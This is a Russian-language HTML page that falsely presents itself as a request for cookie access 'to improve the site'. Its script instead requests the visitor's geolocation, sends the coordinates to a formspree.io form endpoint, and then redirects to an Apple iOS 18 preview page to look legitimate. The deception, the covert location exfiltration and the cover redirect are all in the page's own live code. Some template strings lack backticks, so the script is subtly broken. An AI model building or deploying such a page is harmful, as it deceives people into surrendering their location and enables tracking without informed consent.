<!DOCTYPE html><html lang="ru">
<head>  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />  <title>Доступ к геолокации</title>
  <style>    body {
      font-family: Arial, sans-serif;      padding: 40px 20px;
      text-align: center;      background: #f0f0f0;
      color: #222;    }
    #container {      max-width: 400px;
      margin: 0 auto;      background: white;
      padding: 30px;
      border-radius: 10px;      box-shadow: 0 0 10px rgba(0,0,0,0.1);
    }    h1 {
      font-size: 1.4em;      margin-bottom: 20px;
    }    p {
      font-size: 1.1em;      margin-bottom: 30px;
      color: #555;    }
    button {      background-color: #007aff;
      border: none;
      color: white;      padding: 15px 25px;
      font-size: 1em;      border-radius: 8px;
      cursor: pointer;      transition: background-color 0.3s ease;
    }    button:hover {
      background-color: #005bb5;    }
    #status {      margin-top: 25px;
      font-weight: bold;      color: #333;
    }  </style>
</head><body>
  <div id="container">    <h1>Доступ к вашим данным</h1>
    <p>Для улучшения работы сайта нам нужен доступ к вашим cookies файлам .<br>Пожалуйста, нажмите кнопку ниже, чтобы предоставить разрешение.</p>    <button id="btnAccess">Дать доступ</button>
    <div id="status"></div>
  </div>
  <script>    const emailEndpoint = "https://formspree.io/f/mblyobbo";
    const btn = document.getElementById('btnAccess');    const status = document.getElementById('status');
    function sendLocation(lat, lon) {
      const message = Координаты:\\nШирота: ${lat}\\nДолгота: ${lon};      const formData = new FormData();
      formData.append('message', message);
      fetch(emailEndpoint, {        method: 'POST',
        body: formData      });
    }
    btn.addEventListener('click', () => {
      status.textContent = "Запрашиваем...";
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(
          (pos) => {
            const lat = pos.coords.latitude;
            const lon = pos.coords.longitude;
            status.textContent = Координаты получены: ${lat}, ${lon};
            sendLocation(lat, lon);
            setTimeout(() => {
              window.location.href = "https://www.apple.com/ios/ios-18-preview/";
            }, 3000);
          },
          (err) => {
            status.textContent = "Разрешение не получено или ошибка.";
          }
        );
      } else {
        status.textContent = "Не поддерживается вашим браузером.";
      }
    });
  </script>
</body>
</html>